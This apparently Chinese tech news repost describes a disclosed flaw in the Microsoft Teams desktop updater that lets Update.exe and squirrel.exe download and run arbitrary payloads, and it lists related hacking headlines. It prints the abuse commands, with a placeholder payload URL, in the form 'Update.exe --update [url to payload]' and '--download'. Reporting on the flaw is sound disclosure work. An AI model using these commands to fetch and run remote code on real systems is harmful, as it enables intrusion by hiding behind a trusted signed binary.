您当前的位置: 首页 > 时尚名流

Microsoft Teams 升级机制允许黑客执行任意文件

2019-07-22 12:11:24

(公众号:雷锋网) 消息,据 BleepingComputer 美国时间 6 月 29 日报道, 多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许在系统上下载和执行任意文件,

研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向报告了这个问题。

使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

这些命令可以与其他参数一起使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

相同的方法适用于“squirrel.exe”,它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一部分。

安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时,应用程序仍然容易受到攻击,因为微软通知研究员该修复程序将在未来的软件版本中出现。

BleepingComputer 

雷锋网版权文章,未经授权禁止转载。详情见。

 •  1天前 摘要:网络瘫痪,就像飓风侵袭了生活,虽然一切都在原处,但一切都不一样了。科技有温度。天下网商记者 贡晓丽继美国东部城市巴尔的摩被黑客勒索,市政系统全面瘫痪之后,美国佛罗里达州又有两个城市的计算机系统在五月下旬至六月初被黑客攻击。其中一个叫做里维埃拉海滩的小城在坚持了三周之后,上周通过市政会议达成协议,决定向黑客支付65

 •  1天前 新加坡虚拟货币交易平台Bitrue惨遭黑客入侵,总损失价值约420万美元的瑞波币(XRP)和艾达币(ADA)。 据Bitrue官方推特发文,这次入侵事件发生在6月27日凌晨1点,当时Bitrue风险控制团队正在对平台系统进行第二次核查,该黑客乘机利用系统漏洞入侵了近90个Bitrue用户的个人账户。

你眼中的黑客还是靠高超技艺潜入别家电脑系统拿点数据就走的“小偷”吗?然鹅,在这个数据爆炸的时代,你的数据或许也不那么值钱了。 正所谓人为财死,鸟为食亡。为了尽可能捞得金钱,黑客可是啥缺德手段都干得出来——比如勒索攻击。在成了黑客的“新宠”后,如今的勒索攻击不仅是个人和小型企业的噩梦,政府更是他们值得担

 •  天前 报告称黑客入侵电信公司窃取用户数据2019年06月26日 16时06分 安全公司 Cybereason 报告称,在长达七年的间谍行动中,黑客入侵了全球数十家电信公司窃取了大量数据。调查人员表示,攻击者入侵了 0 多个国家的电信公司,旨在收集政府、执法机关和政治相关人员的信息。

 •  5天前 平时看科幻或犯罪片,常有一些高手黑客在破旧的黑白电脑上敲几行代码,就成功入侵大型商业银行或者X国国防部加密服务器的桥段。虽说电影多有艺术化和虚构成分,但剧情倒也不是天马行空。近日,美国宇航局NASA便向大家承认了这种“廉价的电脑入侵高端服务器”的事实。美国宇航局(NASA)监察长办公室(OIG)本周发布报告称,2018

 •  6天前 据外媒消息,美国宇航局(NASA)监察长办公室(OIG)本周发布报告显示,2018 年 4 月,黑客曾侵入该机构网络,从 2 个文件中窃取了约 500MB 的与火星科学实验室任务相关的数据。据悉,黑客除了访问 JPL 的任务网络外,还访问了 JPL 的 DSN IT 网络。NASA OIG 表示: 这次攻

 •  7天前 黑客利用 Raspberry Pi 入侵 JPL 网络2019年06月22日 22时11分 美国司法部监察长办公室发表报告称,去年黑客利用 Raspberry Pi 入侵了 JPL 的网络。事故发生在 2018 年 4 月,JPL 的某位出于未知目的把一个 Raspberry

 •  8天前 卖彩票中奖的几率是多少?千万分之一。对黑客来说,通过撞库攻击来获取平台的账号和密码,这几率要比中彩票高出不少。今年2月,海淀警方接到北京字节跳动公司报案,后者称旗下App抖音千万级外部账号遭到恶意撞库攻击,其中几百万账号密码与外部泄露密码吻合。5月底,犯罪嫌疑人汪某被警方抓获。 抖音遭撞库,黑客牟利超百万据汪某交代,其

 •  12天前 黑客组织瞄准美国电网2019年06月17日 1 时06分 安全公司 Dragos 的研究人员报告,至少两次攻击工业基础设施的黑客组织正在积极侦查美国电网。该黑客组织被 Dragos 命名为 Xenotime,该组织使用恶意程序关闭生产流程或让 SIS 控制的机器工作在不安全的状

专注科技资讯挖掘,通过关键词过滤科技资讯,提高阅读效率10倍以上。 网站定位极少数高效能人士,精准快速定位资讯,大大提高阅读效率。

推荐阅读
图文聚焦